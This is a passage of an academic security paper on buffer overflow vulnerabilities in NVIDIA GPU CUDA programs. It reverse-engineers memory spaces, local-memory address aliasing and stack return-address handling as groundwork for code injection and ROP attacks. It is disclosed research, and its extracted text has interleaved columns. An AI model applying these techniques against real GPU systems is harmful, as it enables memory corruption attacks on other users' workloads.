GPU Memory Exploitation for Fun and Profit
Yanan Guo, University of Rochester; Zhenkai Zhang, Clemson University;
Jun Yang, University of Pittsburgh
https://www.usenix.org/conference/usenixsecurity24/presentation/guo-yanan
This paper is included in the Proceedings of the
33rd USENIX Security Symposium.
August 14–16, 2024 • Philadelphia, PA, USA
978-1-939133-44-1
Open access to the Proceedings of the
33rd USENIX Security Symposium
is sponsored by USENIX.
GPU Memory Exploitation for Fun and Profit
Yanan Guo∗† Zhenkai Zhang∗ Jun Yang
University of Rochester Clemson University University of Pittsburgh
Abstract Memory safety violations (memory errors) have long been
As modern applications increasingly rely on GPUs to accel- a significant security concern for computing systems. These
erate the computation, it has become very critical to study violations are the most common root cause of modern exploits
and understand the security implications of GPUs. In this (attacks). For example, buffer overflows can allow attackers to
work, we conduct a thorough examination of buffer overflows overwrite return addresses and thus hijack the control flow of
on modern GPUs. Specifically, we demonstrate that, due to a program, potentially leading to the execution of malicious
GPU’s unique memory system, GPU programs suffer from code. In fact, reports from Google and Microsoft show that
different and more complex buffer overflow vulnerabilities memory errors account for around 70% of all security issues
compared to CPU programs, contradicting the conclusions of addressed in their products [23, 39]. Memory safety viola-
prior studies. In addition, despite the critical role GPUs play tions, together with the associated exploitation techniques,
in modern computing, GPU systems are missing essential have been widely studied for CPU programs. Modern CPUs
memory protection mechanisms. Consequently, when buffer have even implemented certain built-in defense mechanisms
overflow vulnerabilities are exploited by an attacker, they can against these vulnerabilities (e.g., [31, 32, 59]). However, the
lead to both code injection attacks and code reuse attacks, vulnerabilities in GPU programs have not received the same
including return-oriented programming (ROP). Our results attention.
show that these attacks pose a significant security risk to mod- CUDA [41], developed by NVIDIA, is one of the most
ern GPU applications. popular general-purpose GPU programming languages in use
today. Since CUDA is extended from C and C++–languages
1 Introduction known for their memory-unsafe characteristics–there is a con-
cern that CUDA programs could have similar memory safety
Graphic Processing Units (GPUs) were originally designed vulnerabilities. In this paper, we delve into this concern, aim-
and used for high-quality graphics rendering. However, over ing to answer the following questions:
the past decade, they have evolved into general-purpose com- Can memory errors occur in CUDA programs running on
puting platforms. Due to their high-throughput capabilities, NVIDIA GPUs? If so, what types of attacks can arise from
GPUs are now used in various fields, including weather pre- these errors?
diction [37], crypto-currency mining [28], and bioinformat-
ics analysis [34]. In addition, today GPUs have become the Several prior studies have explored the memory safety vul-
de facto standard choice for running deep learning applica- nerabilities in CUDA programs [19, 38, 48]. They show that
tions [9, 17, 24, 29, 30, 47, 52, 55, 56]. Given the growing memory safety violations, especially buffer overflows, can
significance of GPUs, NVIDIA recently announced the Grace occur in CUDA programs as well. However, they also argue
Hopper Superchip [42] which is designed for giant-scale artifi- that conventional CPU memory exploitation techniques, such
cial intelligence (AI) and high-performance computing (HPC) as code injection and code reuse, are inapplicable for attack-
applications. This superchip combines the NVIDIA Grace ing CUDA programs. We found that their investigations have
CPUs and Hopper GPUs using the high-speed interconnect, significant limitations.
NVLink [43]. This wide employment of GPUs inevitably First, the investigations in these studies are preliminary and
urges a thorough study on their security implications. lack a comprehensive analysis of the memory safety vulner-
∗ Theseauthors contributed equally to this work.
abilities inherent to GPU programs. For example, unlike C
† This
work was primarily conducted while the author was affiliated with and C++, CUDA features multiple, distinct memory spaces,
the University of Pittsburgh. aligning with the GPU’s specialized memory hierarchy. Data
USENIX Association 33rd USENIX Security Symposium 4033
SM
SM Register file each CUDA program; certain functions from this library are
Core Core LD/ST loaded into GPU memory upon the execution of any CUDA
Compute units SFU
Core Core LD/ST program. Importantly, this library code contains multiple ROP
L1 $ Core Core LD/ST gadgets, including several memory read/write gadgets, which
SFU
Core Core LD/ST can enable powerful ROP-based attacks.
Shared mem
L1/L2 TLB Finally, we show that the above memory exploitation tech-
niques can be used to attack modern GPU applications such
Shared L2 $ Shared L3 TLB
as deep neural network (DNN) inference. For example, by
Device mem modifying the DNN weights, the attacker can significantly
Page table Page
GMMU degrade the DNN inference accuracy, reducing it to the same
Page walk queue level of random guessing in the most severe cases.
Page walk cache Responsible disclosure. We disclosed our findings to
NVIDIA in October 2023, who acknowledged our work and
Figure 1: GPU architecture overview. requested to be notified when the results become publicly
available.
in different memory spaces have different scopes and are ac-
cessed in different manners. Prior studies have only shown
that buffer overflows can occur within individual memory 2 Background
spaces. They have not explored whether a buffer overflow in
In this section, we provide an overview of the GPU archi-
one memory space can directly affect data in another mem-
tecture, programming models, and memory spaces. Note that
ory space. Second, these studies were conducted on earlier
while the concepts we describe are general to GPU computing
NVIDIA GPUs, with older architectures (Pascal and earlier)
platforms, we use NVIDIA’s terminology for our descriptions.
and CUDA compute capabilities (sm_60 and earlier). Notably,
NVIDIA has made significant changes to the GPU system
starting with the Volta architecture (sm_70), which was re- 2.1 GPU Basics
leased in 2017. Thus, the conclusions made in prior studies
GPU architecture. Figure 1 shows an architecture overview
may not apply to modern GPU architectures.
of a typical GPU. The basic processing units in a GPU are
In this work, we conduct a thorough examination of the called streaming multiprocessors (SMs). Each SM has a set
buffer overflow problem on modern NVIDIA GPUs. First, we of simple cores. With these cores, an SM can execute a group
reverse engineer the mechanisms used to access various mem- of parallel threads (known as a warp) in a Single-Instruction
ory spaces. Specifically, we show how GPU hardware iden- Multiple-Thread (SIMT) fashion. Modern GPUs usually have
tifies memory references to each memory space and how it tens to hundreds of SMs. With a typical warp size of 32, a
conducts address translation for these memory spaces. Based GPU can run thousands of threads simultaneously.
on the reverse engineering results, we demonstrate that an Each SM in a GPU contains its own register file, consisting
out-of-bounds (OOB) operation on data in one memory space of general-purpose registers and special registers. The general-
can influence data in another, despite the fact that different purpose registers are partitioned among the threads that run on
memory spaces utilize different instructions for access. Fur- the SM. For example, in NVIDIA Ampere GPUs, every thread
thermore, we reveal that OOB operations can be exploited in an SM has its own 256 general-purpose registers, labeled
to access data beyond their legitimate scopes. For example, from R0 through R255 [12, 46]. These registers temporarily
one thread can access the local memory belonging to another store data that threads need immediate access to, such as
thread. variables or intermediate computation results. On the other
Then, we study potential GPU attack methodologies lever- hand, special registers have different roles and are used for
aging these buffer overflow vulnerabilities. We found that specialized tasks. For example, CLOCK provides the current
modern NVIDIA GPUs are missing fundamental memory clock cycle count. Unlike general-purpose registers, some of
protection mechanisms. As a result, traditional memory ex- the special registers are shared among all threads in the SM.
ploitation techniques (which have been mitigated on CPUs) To serve the memory bandwidth demands of a large amount
remain feasible on GPUs. For example, GPUs do not distin- of threads, a GPU has its dedicated memory system, as shown
guish between code and data pages: data pages are executable, in Figure 1. Each SM has its own private L1 cache and shared
and code pages are writable. memory. SMs are connected to the shared L2 cache through
In addition, we analyze the mechanics of function calls a hierarchical on-chip network; The L2 cache is further con-
and returns on modern GPUs. Our investigation reveals that nected to memory controllers which interface with the off-
code reuse attacks, such as return-oriented programming chip device memory. Similar to host memory on the CPU side,
(ROP) [50], can be employed against CUDA programs. We device memory is also based on DRAM. Currently, GDDR6
further discover that the CUDA driver API library is linked for and HBM2 are the two most widely used DRAM types in
4034 33rd USENIX Security Symposium USENIX Association
client and server GPUs, respectively. Note that the memory models have emerged. Of these, CUDA stands out as arguably
systems of the CPU and GPU are independent of each other. the most successful and broadly used [41]. Listing 1 presents
Before a program starts running on the GPU, the GPU driver a simple CUDA program. Within the context of a CUDA
loads the corresponding code into the device memory. Sim- program, there are several specific terms:
ilarly, the data required by the GPU program must also be
- GPU kernel. A kernel (line 7) is a function that is executed
transferred to the device memory (before the data can be ac-
on the GPU and can be invoked from the host CPU. A
cessed). This is typically done through explicit operations in
CUDA program may consist of one or more kernels. To
the program, although there are instances where the driver
invoke a kernel, the GPU driver sends a corresponding
manages this data transfer implicitly [1].
kernel launch command to the GPU. It will first create a
grid of thread blocks, with each block containing a certain
1 /* * device function * */
2 _ _ d e v i c e _ _ v o i d add ( c h a r * d _ g l o b a l ) {
number of threads. These thread blocks are then scheduled
3 d _ g l o b a l [ 0 ] += 1 ; onto the available SMs on the GPU. When launching a
4 }
5
kernel, the host code needs to specify the desired number of
6 / * * CUDA k e r n e l * * / thread blocks and threads. For example, Listing 1 launches
7 _ _ g l o b a l _ _ v o i d mem_type ( c h a r * d _ g l o b a l ) {
8 char d_local [ 1 0 ] ;
a kernel with 8 thread blocks and 32 threads in each block
9 d_local [0] = d_global [ 0 ] ; (line 22).
10 __shared__ d_shared [ 1 0 ] ;
11 d_shared [0] = d_global [ 0 ] ; - Device function. A device function is a function that can
12 add ( d _ g l o b a l ) ;
13 }
only be called from kernels or other device functions. It can
14 only be executed on the GPU (line 2).
15 / * * CPU f u n c t i o n , c a l l i n g t h e c u d a k e r n e l * * /
16 v o i d k e r n e l _ l a u n c h ( c h a r * d_cpu ) { NVIDIA PTX and SASS. PTX is an intermediate-level in-
17 char * d_global ;
18 / * * A l l o c a t e a GPU b u f f e r * * / struction set for NVIDIA GPUs that remains stable across
19 c u d a M a l l o c (& d _ g l o b a l , 1 0 2 4 ) ; different GPU generations. CUDA code is first compiled into
20 cudaMemCpy ( d_cpu , d _ g l o b a l , 1 0 2 4 ,
21 cudaMemcpyHostToDevice ) ; PTX, and PTX is further compiled down to SASS, the low-
22 mem_type <<<8,32>>> ( d _ g l o b a l ) ; level assembly language for NVIDIA GPUs. SASS instruc-
23 }
tions directly execute on NVIDIA GPU hardware. These
Listing 1: An example CUDA program that uses multiple instructions are tailored to the specific architecture of the
GPU memory spaces. GPU; different GPU generations may use different SASS
instructions.
GPU virtual memory management. Modern GPU memory
is virtualized, operating on a paging system. When SMs gen- scheduling code constant opcode_low
erate virtual addresses, the memory management unit (MMU)
MOV R2, 0xdeadbeef: 0x 003fde00 00000f00 deadbeef 00027802
on the GPU performs virtual-to-physical address translation
using the GPU page tables. Each running GPU program (i.e., opcode_high register index
a GPU context) has one page table. These page tables (from
different active GPU contexts) are stored in the GPU memory Figure 2: The encoding of the MOV instruction on Volta GPUs.
and are regulated by the GPU driver [58]1 . Similar to CPU
SASS instruction encoding. NVIDIA GPUs use a fixed-
page tables, a GPU page table also has multiple levels: given a
length instruction encoding format. Originally, the instruction
virtual memory address, the GPU MMU walks through these
length was 8 bytes. Starting with the Volta generation (re-
levels to find the page table entry (PTE) that contains the de-
leased in 2017), the instruction length has been extended to
sired translation information. Prior work [58] has shown that
16 bytes. Unlike CPUs that typically use hardware-based in-
recent NVIDIA GPUs use 5-level page tables. During a page
struction scheduling, NVIDIA GPUs delegate this scheduling
table walk, a 49-bit virtual address is segmented, and its parts
task to the compiler. On Volta and later GPUs (with 16-byte
are used to select the walking path through the hierarchy.
instructions), the scheduling codes are embedded into the
higher bits of each individual instruction, which specify the
2.2 GPU Programming and Execution minimum wait time between consecutive instructions to meet
dependency constraints. Figure 2 shows the encoding of the
GPU programming model. GPUs were originally designed
MOV instruction on Volta GPUs.
to accelerate graphics and multimedia processing; they could
only be programmed using certain APIs such as OpenGL [53]
and DirectX [36] to support 2D/3D graphics rendering. As 2.3 GPU Memory Spaces
the demand for utilizing GPUs in non-graphics computing
Most GPU programming models allow memory allocation
tasks increases, various general-purpose GPU programming
in different memory spaces, each of which has its unique
1 The GPU driver also maintains a copy of the page tables in host memory. behavior. Listing 1 shows a CUDA program that uses global,
USENIX Association 33rd USENIX Security Symposium 4035
local, and shared memory, which are the most frequently used Table 1: The specification of the pointers in Listing 1.
memory spaces in CUDA programs. The specific features
of these memory spaces are shown in Table 1. We omit the Pointer Memory type Storage Cached Load/store Scope
instructions
discussion of other memory spaces, such as texture memory,
d_global Global memory Device memory Yes LDG/STG Process
as they are not related to our study. (off chip)
- Global memory is managed by the GPU driver. Buffers in d_local Local memory Device memory Yes LDL/STL Thread
(off chip)
global memory can only be allocated by CPU code (before d_shared Shared memory Shared memory No LDS/STS Thread
kernel launches) through driver API calls (line 19 in List- (on chip) block
ing 1). Global memory resides in the GPU’s off-chip device
memory; it can be cached in both the L1 and L2 caches. A
OOB operation on a local memory buffer can compromise
buffer in global memory is accessible to all the threads in
other data stored in that same local memory. However, they
all the kernels of the program, until the buffer is freed. The
have not explored whether such an OOB operation can affect
load and store operations for global memory are usually
data in a different memory space.
performed using the instructions LDG and STG, respectively.
Second, given that these studies were carried out several
In Listing 1, d_global is a buffer in global memory.
years ago, they only examined older GPUs (before Volta).
- Local memory is private to each thread. It is used to store However, NVIDIA has made significant changes to their
the stack of a thread and is thus also called stack memory. GPUs since the Volta architecture [25]. For example, a new
Similar to global memory, local memory also resides in the ISA has been introduced, where the instruction length was
device memory (and the caches). However, unlike global changed from 8 bytes to 16 bytes. Therefore, conclusions
memory, data in local memory do not persist across kernels from these studies may not apply to newer GPU architectures.
(since they are thread-private). The instructions LDL and For example, these prior studies have two common conclu-
STL are particularly used for local memory. d_local in sions. 1) Exploiting buffer overflow to hijack control flow in
Listing 1 is a buffer stored in local memory. CUDA is very difficult because the return address is stored in
- Shared memory is a scratchpad memory region. It is shared an undisclosed memory location, not on the stack. 2) Tradi-
among all the threads within the same thread block. As tional code injection attacks cannot be applied against CUDA
shown in Figure 1, shared memory is on-chip. Developers programs because code and data are separated in memory.
can place the data that is accessed frequently by threads in However, through our analysis (in Section 4), we found that
the same block into shared memory, in order to avoid the their conclusions do not hold.
slow global memory access. Data in shared memory are not
backed up in the off-chip device memory. LDS and STS are
3.2 Our Goal
used for shared memory operations. d_shared in Listing 1
resides in shared memory. As GPUs have become a major computing component these
In addition to the instructions mentioned above that are days, it is important to understand the security problems that
used for each particular memory space, there are also generic exist in modern GPUs. Our objective is to present an in-depth
load and store instructions LD and ST, which can be used for analysis of buffer overflow vulnerabilities on these computing
accessing all the memory spaces. devices, shedding light on the hidden threats that have been
overlooked for years.
3 GPU Memory Safety
4 Demystifying GPU Memory
3.1 Prior Art
In this section, we provide a detailed analysis of GPU buffer
Since CUDA is an extension of C/C++, CUDA programs can overflows, addressing the limitations mentioned in Section 3.
also have memory vulnerabilities similar to those in C/C++ To gain a thorough understanding of the GPU memory model,
programs. Several prior studies [19, 38, 48] have revealed that we develop a tool using Direct Memory Access (DMA) to
some of the memory errors found in CPU programs, such as dump the content of device memory. We further manage to
buffer overflows, can also occur in CUDA programs. However, recover the page tables stored in device memory. NVIDIA
these studies have some limitations, which we explain below. has made their driver source code public. Therefore, from the
First, the investigations presented in these studies are fun- driver code section concerning GPU page management [2]
damental and do not delve deeply into the problems particular (and other NVIDIA documents [45]), we can obtain the over-
to GPUs. For example, as explained in Section 2.3, CUDA all format of the page table on NVIDIA GPUs. This allows
features multiple, distinct memory spaces (unlike C and C++). us to identify and reconstruct the page table from the ex-
Prior studies have only identified that buffer overflow errors tracted device memory. Note that unless specified otherwise,
can occur within a specific memory space. For instance, an all the experiments in this section are conducted on a system
4036 33rd USENIX Security Symposium USENIX Association
with an NVIDIA GeForce RTX 3080 GPU, NVIDIA driver that when LD/ST are used to access local memory, the 49-
470.63.01, CUDA 11.4, and the Ubuntu 20.04 OS. To simplify bit address appears to be the 24-bit address prefixed with a
the analysis, we turn off CUDA ASLR. 25-bit value (which is 0x7ffff2 on our system). Note that
virtual addresses belonging to other memory spaces never
begin with this prefix value on our machine. Unlike global
4.1 Buffer Overflows across Memory Spaces memory, the compiler always prefers to access local memory
Here we study the buffer overflow issues in CUDA programs. with LDL/STL, even when the debug flag is on.
As explained in Section 3, prior studies (e.g., [38]) have al-
ready shown that buffer overflows can cause memory corrup- 1 __global__ void l o c a l _ a r r ( ) {
2 uint32_t arr [10];
tion within a single memory space. Thus, we focus more on 3 f o r ( i n t i = 0 ; i < 1 0 ; i ++)
investigating the impact of buffer overflows across different 4 a r r [ i ] = 0 xdead0000+ t h r e a d I d x . x ;
5 uint32_t * ptr = arr ;
memory spaces. Specifically, we first explore this problem 6 p r i n t f ( " t h r e a d %u a d d r %p d a t a %u \ n " ,
between local and global memory, and then extend the study 7 threadIdx . x , ptr , ptr [ 0 ] ) ;
8 }
to cover the problem between these two and shared memory. 9 i n t main ( ) {
10 c u d a _ k e r n e l < < <1 ,32 > > >() ;
11 return 0;
4.1.1 Accesses to Global and Local Memory 12 }
Global memory accesses are relatively straightforward. Listing 4: A simple CUDA program that allocates buffers in
Global memory is indexed using a 49-bit virtual address local memory.
(which is stored as a 64-bit value). There are two primary Memory layout. We use the program in Listing 4 to explain
ways to access global memory: using the specialized LDG/STG the local memory layout: the CUDA kernel (local_arr) is
instructions or the generic LD/ST instructions (cf. Section 2.3). launched with 32 threads per thread block and just one thread
These two pairs of instructions operate in a similar manner: as block overall. In this kernel, every thread allocates a local ar-
demonstrated in Listing 2, the target virtual memory address ray (arr), resulting in 32 individual arrays in total. According
of the instruction is stored in a 64-bit register, which is formed to NVIDIA, each thread is only able to access its own array,
by combining two 32-bit registers. We are not aware of any but not the arrays that belong to other threads.
fundamental differences between accessing global memory To understand how local memory is stored in the device
using these two pairs of instructions. The choice of which memory, we execute the program in Listing 4 and pause it at
pair to use appears to be based on the compiler’s preference. line 6. Then, we dump the device memory content and identify
Empirically, we observe that when the debugging option is en- the location of arr within it (by the data pattern). Figure 3
abled, the NVCC compiler always chooses LD/ST, otherwise (b) shows a segment of the dumped device memory where
it prefers LDG/STG. arr resides. From this figure, we can observe that the local
memory of different threads appears interleaved in the device
/** R6: 0xcda00000 **/ /** R6: 0xfffd80 **/ memory. Specifically, the device memory sequentially stores
/** R7: 0x7fff **/ LDL R8, [R6]
/** R6.64 means R7||R6 **/ STL [R6], R8 arr[0] from all threads, then arr[1] from all threads, and
LDG R8, [R6.64] so forth. We then conduct further experiments, adjusting the
STG [R6.64], R8 /** R6: 0xf2fffd80 **/
/** R7: 0x7fff **/ total thread count and the array’s data type. These experiments
LD R8, [R6.64] LD R8, [R6.64] reveal that every 32 bits of local memory from threads in a
ST [R6.64], R8 ST [R6.64], R8
warp (comprising 32 threads) are always stored contiguously
Listing 2: Code for accessing Listing 3: Code for accessing within the device memory. For variables larger than 32 bits,
global memory. local memory. they are split into 32-bit segments and stored separately. Note
that this layout information can help an attacker deliberately
As local memory is private to individual threads, local tamper with the local memory data, which we will show later.
memory accesses are more complicated than global memory Addressing. Given that each thread has its own private arr,
accesses, as detailed below. one might naturally expect that each arr would have a dis-
Instructions. Much like global memory, there are also two tinct virtual address, which is similar to the scenario on CPUs.
sets of instructions for accessing local memory, LDL/STL and However, when we print the address of arr[0] (or ptr[0])
LD/ST. However, they work very differently. As shown in as done in line 6 of Listing 4, we have two interesting observa-
Listing 3, LDL/STL uses a 24-bit address2 stored in a 32-bit tions, as shown in Figure 4. First, arr[0] of different threads
register. In contrast, as explained earlier, LD/ST requires a 49- actually have the same virtual address. This virtual address
bit virtual address (from a 64-bit register). In fact, we found is 0x7ffff2fffd80 on our machine (prefix+local memory
2We found that the local memory for each thread is indexed with a 24-bit address, cf. Listing 3). Second, when performing a data access
address using CUDA-GDB. This observation aligns with the findings from using this address, each thread retrieves different data. More
prior research [57]. specifically, for a given thread, the retrieved data corresponds
USENIX Association 33rd USENIX Security Symposium 4037
Page table
PA frame: 0x3ea VA frame: 0x7fffc40
3ea14000: 00 00 ad de 01 00 ad de 02 00 ad de 03 00 ad de /* ***************** 7fffc4014000: 00 00 ad de
xx 00 ad de 3ea14010: 04 00 ad de 05 00 ad de 06 00 ad de 07 00 ad de (arr[0], thread 0) (arr[0], thread 0)
:7ffff2fffd80 3ea14020: 08 00 ad de 09 00 ad de 0a 00 ad de 0b 00 ad de to
(arr[0], thread x) 7fffc4014004: 01 00 ad de
… ... (arr[0], thread 31)
3ea14070: 1c 00 ad de 1d 00 ad de 1e 00 ad de 1f 00 ad de *******************/ (arr[0], thread 1)
3ea14080: 00 00 ad de 01 00 ad de 02 00 ad de 03 00 ad de /* ***************** 7fffc4014008: 02 00 ad de
3ea14090: 04 00 ad de 05 00 ad de 06 00 ad de 07 00 ad de (arr[1], thread 0) (arr[0], thread 2)
xx 00 ad de
:7ffff2fffd84 3ea140a0: 08 00 ad de 09 00 ad de 0a 00 ad de 0b 00 ad de to
(arr[1], thread x) 7fffc401400c: 03 00 ad de
… ... (arr[1], thread 31)
3ea140f0: 1c 00 ad de 1d 00 ad de 1e 00 ad de 1f 00 ad de *******************/ (arr[0], thread 3)
... … … ... … ...
Virtual Physical Virtual
local addr addr Physical memory PT addr
(a) (b) (c)
Figure 3: The mapping details of local memory: (a) the translation between virtual local addresses and physical addresses; (b)
the layout of local memory (in device memory); (c) the translation between virtual PT addresses and physical addresses.
to arr[0] of that thread. With these results, we believe the mapped to the physical address of this data block, as shown in
mapping between the virtual and physical addresses of lo- Figure 3 (c). Importantly, when using this virtual address
cal memory aligns with the one depicted in Figure 3 (a) and to access local memory, every thread gets the same data
(b): the physical address that a virtual address points to may when accessing the same virtual address. For example, any
vary, depending on the ID of the thread accessing this virtual thread accessing the address 0x7fffc4014000 will retrieve
address. the value of thread 0’s arr[0] (0xdead0000), regardless of its
A natural question here is how the same virtual address thread ID. Similarly, using the address 0x7fffc4014004, ev-
is translated to different physical addresses (for different ery thread gets the value of thread 1’s arr[0] (0xdead0001).
threads). While the specifics of local memory address transla- From the above results, we have two conclusions. First,
tion on NVIDIA GPUs remain undisclosed, we give a conjec- for each physical address in local memory, there are two vir-
ture here: there is likely a unique address translation mech- tual addresses that can be used to access this physical ad-
anism for local memory, which is based on both the address dress. Only one of them has a valid mapping in the page
and the thread ID. Moreover, the GPU hardware is able to table; we refer to this virtual address as the virtual PT ad-
recognize that a given memory operation is targeting the local dress (e.g., 0x7fffc4014000 in Figure 3 (c)), and refer to
memory (instead of other memory spaces) based on the given the other virtual address as the virtual local address (e.g.,
virtual address or the instruction. Specifically, it is considered 0x7ffff2fffd80 in Figure 3 (a)). Second, as explained
a local memory operation if 1) the instruction is LDL/STL above, when accessing a virtual local address, the GPU hard-
or 2) the instruction is LD/ST and the address begins with a ware can recognize that this address is targeting the local
certain pattern (e.g., 0x7ffff2). memory and triggers a special address translation routine for
it. This special routine takes the thread ID into account, and
thread 0 addr 0 x 7 f f f f 2 f f f d 8 0 d a t a 0 xdead0000 thus ensures that each thread can only access its own local
thread 1 addr 0 x 7 f f f f 2 f f f d 8 0 d a t a 0 xdead0001 memory. However, when accessing a virtual PT address, the
thread 2 addr 0 x 7 f f f f 2 f f f d 8 0 d a t a 0 xdead0002
... GPU hardware does not recognize it as a local memory access,
and therefore does not employ this special translation routine.
Figure 4: The output of line 6 in Listing 4. Once knowing this address, one thread can access/modify the
local memory of another thread in the program.
Upon examining the page table of the program in List-
To further validate that both the virtual local address and
ing 4, we have a very interesting observation. The afore-
the virtual PT address point to the same physical address,
mentioned virtual addresses for local memory data (e.g.,
we conduct a read-after-write experiment. First, we write to
0x7ffff2fffd80 for arr[0]) are not mapped to any valid
arr[0] of thread 0 using the virtual PT address. Then, we
physical addresses, according to the page table.3 Instead,
read arr[0] of thread 0 using the virtual local address. We
for each data block in the local memory, a disparate vir-
found that we can only read out the previously written value if
tual address (e.g., 0x7fffc4014000 for thread 0’s arr[0])–
we access another buffer whose size is at least 128B between
seemingly unrelated to the unmapped virtual address above–is
our write and read operations. Given that the L1 Dcache on
3 This
also confirms that there is a special address translation path for our GPU is 128B and L1 is indexed using virtual addresses
local memory addresses. and tagged using physical addresses, we believe that these
4038 33rd USENIX Security Symposium USENIX Association
Table 2: Summary of the buffer overflow problem in CUDA; ✓ means the OOB operation can affect this memory space, while
✗ means it cannot.
OOB Global mem Local mem Shared mem
Same Same Same Same Same Same Same Same Same Same Same Same
thread thread block kernel program thread thread block kernel program thread thread block kernel program
Global LDG/STG ✓ ✓ ✓ ✓ ✓ ✓ ✓ ✗ ✗ ✗ ✗ ✗
mem LD/ST ✓ ✓ ✓ ✓ ✓ ✓ ✓ ✗ ✓ ✓ ✗ ✗
Local LDL/STL ✗ ✗ ✗ ✗ ✓ ✗ ✗ ✗ ✗ ✗ ✗ ✗
mem LD/ST ✓ ✓ ✓ ✓ ✓ ✓ ✓ ✗ ✓ ✓ ✗ ✗
Shared LDS/STS ✗ ✗ ✗ ✗ ✗ ✗ ✗ ✗ ✓ ✓ ✗ ✗
mem LD/ST ✓ ✓ ✓ ✓ ✓ ✓ ✓ ✗ ✓ ✓ ✗ ✗
two virtual addresses are linked to the same physical address. On the tested system, the minimum difference between such
addresses is 0x10000000. With this discrepancy, whether an
Takeaway 1: On NVIDIA GPUs, each data block in OOB operation on local memory can affect global memory
local memory is linked to two virtual addresses; one actually depends on the specific instruction handling the op-
of these addresses allows a CUDA thread to access/- eration: when using LDL/STL, which operates with a 24-bit
modify the local memory of other threads. address (the lower 24 bits of the virtual local address), OOB
operations on local memory cannot affect global memory. In
contrast, if LD/ST which takes the full 64-bit virtual local ad-
4.1.2 Overflows across Global and Local Memory dress is used, an OOB operation on local memory has the
potential to fetch/modify data in global memory.
OOB global memory references. Recall that global mem-
ory operations always use a 64-bit address, regardless of the
4.1.3 Overflows across Shared Memory and Local/-
instruction used. Therefore, attackers could exploit a buffer
Global Memory
overflow vulnerability in global memory to influence any lo-
cation in the device memory, including the local memory. Data in shared memory is accessed in a similar manner to data
Specifically, when accessing a global memory buffer with an in local memory. Specifically, shared memory can be accessed
OOB index, the attacker can manipulate the index to direct with either 1) the specialized instructions LDS/STS, using a
the target address (base address + index) towards either 1) the 24-bit address, or 2) the generic instructions LD/ST using a
virtual PT address or 2) the virtual local address of the data 49-bit address. Again, the 49-bit address is formed by adding
in the local memory. Here we discuss the feasibility of these a prefix to the 24-bit address, which is 0x7ffff4 on the tested
two approaches: system. Consequently, when using the LD/ST instructions, an
- Accessing a virtual PT address. As mentioned earlier, OOB operation on data in shared memory may affect the data
there are two sets of instructions for global memory ref- in global or local memory. In addition, an OOB operation
erences, LD/ST and LDG/STG. From our experiments, pro- on data in global or local memory (with LD/ST) can affect
viding any of these instructions with a virtual PT address the data in shared memory. Note that, unlike local memory,
causes them to execute as expected, accessing the data in shared memory does not have a virtual PT address, since it is
the local memory (of any thread) with the given address. not part of the device memory. This means, accesses to shared
memory remain confined to their legitimate scope (within
- Accessing a virtual local address. When providing a vir-
the thread block). We cannot utilize virtual PT addresses to
tual local address to LDG/STG, it prompts a runtime error
perform out-of-scope shared memory accesses (as done for
citing an illegal memory access. In contrast, when pro-
local memory).
viding such an address to LD/ST, the instruction executes
without any error. However, as explained before, using a vir-
tual local address prevents us from modifying or accessing 4.1.4 Summary
data belonging to other threads. We discuss this approach We provide a comprehensive summary of the overflow prob-
only for completeness. In real-world scenarios, the attacker lem in CUDA in Table 2. First, with respect to the memory
would likely choose the former approach. space, when using the generic memory instructions LD/ST,
In short, a buffer overflow error in global memory may allow the problem can occur within a single memory space or across
an attacker to target a virtual PT address, granting the attacker different spaces. In contrast, when using the specialized in-
potential access to, or the ability to modify, the local memory structions (e.g., LDL/STL), the problem is restricted to a single
data of any active thread in the program. memory space. An exception is that, OOB global memory
OOB local memory references. We found that there is a references with LDG/STG can influence local memory.
substantial gap between the virtual local addresses (of the lo- Second, in terms of memory scope (i.e., visibility), when
cal memory) and the virtual addresses of the global memory. targeting local memory, an overflow error can result in ac-
USENIX Association 33rd USENIX Security Symposium 4039
cesses beyond the intended scope. This is due to the use of to modify are pushed to the stack to be later restored upon the
virtual PT addresses. In other scenarios, memory accesses are function’s completion. Conversely, after the function finishes,
always confined to the legitimate scope. these registers are popped from the stack and restored. These
Notice that the conclusions presented in this section, par- code snippets provide two key insights into CUDA’s stack
ticularly those related to how GPU memory accesses are management:
managed, are based on extensive reverse engineering efforts.
- The role of R1. In CUDA, R1 is a general-purpose register,
While they are supported by thorough experimentation, we
not a special register [44]. However, the above code implies
cannot claim with absolute certainty that our findings are en-
that R1 can be used as the stack pointer. In fact, by further
tirely accurate. However, it is crucial to note that the primary
examining common CUDA libraries such as libcudnn, we
objective of our reverse engineering analysis is not to perfectly
found that R1 is the only register that has been used as the
reconstruct the GPU memory access functionality, but rather
stack pointer. Notably, NVIDIA’s list of special registers
to investigate the potential for buffer overflow vulnerabilities
does not contain any register for stack pointer [44].
in CUDA programs. Despite any potential inaccuracies in
our reverse engineering results, we have conclusively demon- - Stack commands. Similar to the RISC-V architecture,
strated that buffer overflows on GPUs can be exploited to NVIDIA GPUs do not have dedicated push/pop instruc-
access/modify data across different memory spaces and be- tions. Instead, a push operation is achieved through a local
yond legitimate scopes (Table 2). memory write together with a decrement of the stack pointer.
Conversely, a pop operation is achieved by a local memory
/** Start of the func **/ /** End of the func **/ read and an increment of the stack pointer.
/** RZ is always 0 **/ LDL R2, [R1+0x40] ;
IADD3 R1, R1, -0x70, RZ ; LDL R16, [R1+0x44] ; Return address. In Figure 5, the return instruction (RET) uses
STL [R1+0x68], R25 ; LDL R17, [R1+0x48] ;
STL [R1+0x64], R24 ; LDL R18, [R1+0x4c] ; R20 as an operand. This register is pushed to the stack upon
STL [R1+0x60], R23 ; LDL R19, [R1+0x50] ; entering the function, and retrieved right before the RET in-
STL [R1+0x5c], R22 ; LDL R20, [R1+0x54] ;
STL [R1+0x58], R21 ; LDL R21, [R1+0x58] ; struction. Intuitively, the value in R20 should be related to the
STL [R1+0x54], R20 ; LDL R22, [R1+0x5c] ; return address. To validate this, we run the program in CUDA-
STL [R1+0x50], R19 ; LDL R23, [R1+0x60] ;
STL [R1+0x4c], R18 ; LDL R24, [R1+0x64] ; GDB and we found that the value of R20.64 (i.e., R21||R20)4
STL [R1+0x48], R17 ; LDL R25, [R1+0x68] ; is the same as the expected return address (which in our spe-
STL [R1+0x44], R16 ; IADD3 R1, R1, 0x70, RZ ;
STL [R1+0x40], R2 ; RET.ABS.NODEC R20 0x0 ; cific case is 0x7fffd6fad8e0). To better understand this, we
extract the device memory (before RET is executed) and show
the local memory section in Figure 6. We can see that the
Figure 5: Assembly code when entering/leaving the device value of R20.64 is located in the local memory, near the local
function; the 64B local array in the device function is stored array (filled with 0xdeadbeef). This observation confirms
